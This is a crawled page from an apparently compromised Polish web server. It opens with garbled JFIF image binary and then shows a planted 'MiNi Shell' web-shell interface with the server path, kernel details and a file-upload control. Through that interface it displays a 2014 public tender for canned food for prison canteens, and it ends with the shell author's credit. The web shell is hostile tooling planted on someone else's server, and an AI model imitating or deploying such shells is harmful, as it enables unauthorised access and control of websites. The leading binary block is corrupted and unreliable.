JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140212/28113-N-2014.html

<p class="kh_header"><b>Czarne: Dostawa konserw do kantyn i stołówek Zamawiającego</b><br>
<b>Numer ogłoszenia: 28113 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorska Instytucja Gospodarki Budżetowej "POMERANIA" , ul. Pomorska 1, 77-330 Czarne, woj. pomorskie, tel. 59 833 36 79, faks 59 833 24 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pigbzamowieniapubliczne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa konserw do kantyn i stołówek Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Wyszczególnienie przedmiotu dostawy: 
2.1. dla części I 

L.p.	Asortyment wskazany lub równoważny 	J.m.	Ilość do
1	Flaki rosołowe  160g	szt.	100
2	Bigos domowy 500g	szt	70
3	Leczo pieczarkowe  500g	szt	70
4	Gulaszowa kociołek 600g	szt	70
5	Gołąbki w sosie pomidorowym 500g	szt	70
6	Pulpety w sosie pomidorowym 510g	szt	100
7	Fasola po Bretońsku 540g	szt	50
8	Konserwa turystyczna   320g	szt	950
9	konserwa turystyczna   130g	szt	500
10	Boczek Zbójnicki WD 118g	szt	450
11	Mielonka wiejska WD 118g	szt	450
12	Smażonka wiejska WD 320g	szt	450
13	Gulasz Angielski WD 320g	szt	650
14	Pieczeń Staropolska WD  320g	szt	300
15	Tuszonka wiejska WD 320g	szt	300
16	Szynka familijna WD  320g	szt	500
17	Mielonka tyrolska WD 130g	szt	460
18	Sałatka rybna z łososia WD 150g	szt	400
19	Paprykarz WD 120g	szt	400
20	Smalec domowy WD  120g	szt	600
21	Pasztet podlaski  138g	szt	2000
22	Pasztet podlaski  100g	szt	1500
23	Pasztet podlaski  100g	szt	1000
24	Pasta Sandwicz  105g	szt	500
25	konserwa mispol golonka prasowana 110g alupack	szt.	240
26	konserwa mispol szynka delikatesowa wieprzowa 110g alupack	szt.	800
27	szprot king oscar w sosie pomidorowym 170g	szt.	200
28	pasztet mispol drobiowy paprykowy 131g	szt	600
29	pasztet mispol drobiowy pieczarkowy 131g	szt	600
30	pasztet mispol drobiowy 131g	szt	600
31	tuńczyk taaka ryba w oleju roślinnym 185g	szt.	4000
32	śledź pirat w oleju po gdańsku 170g	szt.	720
33	szprot pirat w sosie pomidorowym 170g	szt.	720
34	konserwa mispol tyrolska 110g+23g gratis 	szt.	160
35	konserwa dems turystyczna 190g	szt.	2400
36	filety śledziowe 170 g king w oleju	szt.	1000
37	filety śledziowe w sosie pomidorowym 460g	szt.	1000
38	sałatki śledziowe 150g lisner	szt.	1200
39	filet z makreli 170 g w sosie pomidorowym pirat	szt.	1000

2.1.1. Miejsce dostawy dla części I 


1)	Kantyna w Zakładzie Karnym w Kamińsku,  ul. XXX-  lecia 1, 11 - 120 Gó-rowo Iławeckie, Kamińsk 
2)	Kantyna w Zakładzie Karnym w Dublinach, Dubliny 16 ,11 - 430 Korsze.
3)	Kantyna w Zakładzie Karnym w Braniewie, Plac Grunwaldzki 2a, 14-500 Braniew
4)	Kantyna w Areszcie Śledczym w Olsztynie, ul. Piłsudskiego 3,10-575 Olsz-tyn;
5)	Kantyna Areszcie Śledczym w Olsztynie. Oddział Zewnętrzny, ul. Opolska 42, 10-625 Olsztyn.
6)	Kantyna w Areszcie Śledczym w Szczytnie , ul. Sienkiewicza 10, 14- 100 Szczytno. 

2.2. dla części II 

L.p.	Asortyment
wskazany lub równoważny 	J.m.	Ilość do
1.	Konserwa turystyczna 300g (alupak)	szt.	3000
2.	Konserwa tyrolska 130g (alupak)	szt.	2000
3.	Pasztet drobiowy 130g (alupak)	szt.	4000
4.	Pasztet drobiowy 300g (alupak)	szt.	3000
5.	Konserwa golonkowa 320g alupak	szt.	2000
6.	Smalec z mięsem 108g (alupak)	szt.	5000
7.	Smalec z cebulą 108g (alupak)	szt	5000
8.	Konserwa mięsna z indykiem 300g (alupak)	szt	2000
9.	Gulasz angielski 300g (alupak)	szt	2000
10.	Szynka konserwowa 320g (alupak)	szt.	2000
11.	Boczek farmerski 320g alupak	szt.	2000
12.	Tuszonka wiejska 320g alupak	szt.	2000
13.	Makrela wędzona 	kg.	100
14.	Łosoś wędzony 100g	szt.	100
15.	Śledź marynowany wiadro 4kg	szt.	20
16.	Marinus Matias filety śledziowe w oleju 225g-tacka	szt.	200
17.	Śledź solony wiadro 4kg	szt.	20
18.	Sałatka śledziowa 150g(opakowanie plastik)	szt.	2000
19.	Koreczki śledziowe 250g	szt.	2000
20.	Filety śledziowe w sosie śmietanowym 300g	szt.	3000
21.	Rolmopsy 400g	szt.	100
22.	Sałatka śledziowa 400g(opakowanie plastik)	szt.	2000
23.	Filet mintaj b/k (mrożony)	kg.	100
24.	Sałatka rybna 160g (z otwieraczem)	szt.	300
25.	Filet panga b/k (mrożony)	kg.	100
26.	Paprykarz szczeciński 341g(z otwieraczem)	szt.	300
27.	Paprykarz szczeciński 135g(alupak)	szt.	3000
28.	Sałatka z makreli 130g(alupak)	szt.	3000
29.	Tuńczyk Kier w oleju rozdrobniony z otwiera-czem	szt.	2000
30.	Tuńczyk Kier w sosie własnym rozdrobniony z otwieraczem	szt.	2000
31.	Tuńczyk Kier  duże kawałki w sosie słodko-kwaśnym z otwieraczem 185g	szt.	1000
32.	Tuńczyk Kier w sosie pomidorowym z otwiera-czem 185g	szt.	1000
33.	Tuńczyk Kier kawałki w oleju z otwieraczem 170g	szt.	1000
34.	Tuńczyk Kier kawałki w zalewie z otwieraczem 170g	szt.	1000
35.	Tuńczyk Kier w sosie z zielonego Curry z otwieraczem 185g	szt.	1000
36.	Tuńczyk Kier w majonezie z Curry z otwiera-czem 185g	szt.	1000
37.	Tuńczyk Kier w sałatce meksykańskiej 185g z otwieraczem	szt.	1000
38.	Tuńczyk Kier w japoński sosie TERIYAKI 170g z otwieraczem	szt.	1000
39.	Szprot w sosie pomidorowym z otwieraczem 170g	szt.	600
40.	Szprot w oleju z otwieraczem 170g	szt.	600
41.	Filety z makreli w oleju z otwieraczem 170g	szt.	600
42.	Filety z makreli w sosie pomidorowym z otwie-raczem 170g	szt.	600
43.	Filety śledziowe w sosie pomidorowym z otwie-raczem 170g	szt.	600
44.	Filety śledziowe w oleju z otwieraczem 170g	szt.	600


3.	Dostawa będzie realizowana w ilościach i  w terminie uzgodnionym z pracownikiem Zamawiającego. Termin dostawy nie może przekraczać dwóch dni od chwili złożenia zamówienia. 
4.	Dostawa będące przedmiotem zamówienia będą realizowane przez Wykonawcę własnym transportem na jego  koszt, z zapewnieniem wyładunku i możliwości sprawdzenia ilości i jakości  dostawy.
5.	Warunki jakie musi spełnić przedmiot dostawy i warunki dostawy: 
1)	przedmiot dostawy musi spełniać wymogi określone przez Zamawiającego dla każdego rodzaju asortymentu i spełniać wymogi określone przepisami odrębnymi a w szczególności; 
a)	ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produk-tów,
b)	ustawy z  dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i ży-wienia,
c)	ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzę-cego,
d)	rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych,
e)	rozporządzenie Ministra Zdrowia z dnia 6 czerwca 2007 r. w sprawie dostaw bezpośrednich środków spożywczych,
f)	ustawy z dnia 7 maja 2009 r. o towarach paczkowanych.
2)	dostarczony asortyment nie może nosić żadnych oznak uszkodzeń fizycznych i biochemicznych, 
3)	dostarczany towar musi być wolny od wad fizycznych i prawnych, 
4)	dostarczany towar musi być pełnowartościowy, z ważną datą do spożycia
5)	godziny i wielkość poszczególnych dostaw będzie ustalana telefonicznie z Wykonawcą przez pracowników Zamawiającego  z dwu-dniowym wyprzedzeniem,
6)	Wykonawca dostarczy przedmiot zamówienia w opakowaniach zbiorczych zapewniających odpowiednie zabezpieczenie dostarczanego asortymentu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy. 
1.	Wszelkie zmiany niniejszej Umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności. 
2.	Zmiana Umowy musi być zgodna z ustawą Prawo zamówień publicznych i zgłoszona przez Stronę nie później niż w terminie 2 dni przed jej planowanym wprowadzeniem.
3.	Zamawiający przewiduje możliwość wprowadzenia następujących zmian do Umowy:
1)	gdy zachodzi konieczność zastąpienia jednego asortymentu innym równoważnym, innym, pod warunkiem, że spełnia wymagania określone przez Zamawiającego w specyfikacji istotnych warunków zamówienia, a zmiana wynika:
a)	z zakończenia produkcji, 
b)	zmiany wielkości opakowania gramatury produktu, gdy producent zakończył produkcję asortymentu w opakowaniach lub gramaturze w poprzednich wielko-ściach, 
2)	gdy niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy,  a w szczególności, gdy wystąpi konieczność na żądanie zakładów karnych/ aresztów śledczych współpracujących z Zamawiającym zmiany ceny lub rodzaju oferowanego asortymentu;
3)	zmiany terminu dostawy - całości lub części w przypadku wystąpienia siły wyższej lub innych okoliczności, za które Strony nie ponoszą odpowiedzialności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pigbzamowieniapubliczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem 
ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23 18-400 Łomża, tel. (086) 215-35-95 - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 10:00, miejsce: Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem 
ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23 18-400 Łomża, tel. (086) 215-35-95 - pok. 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com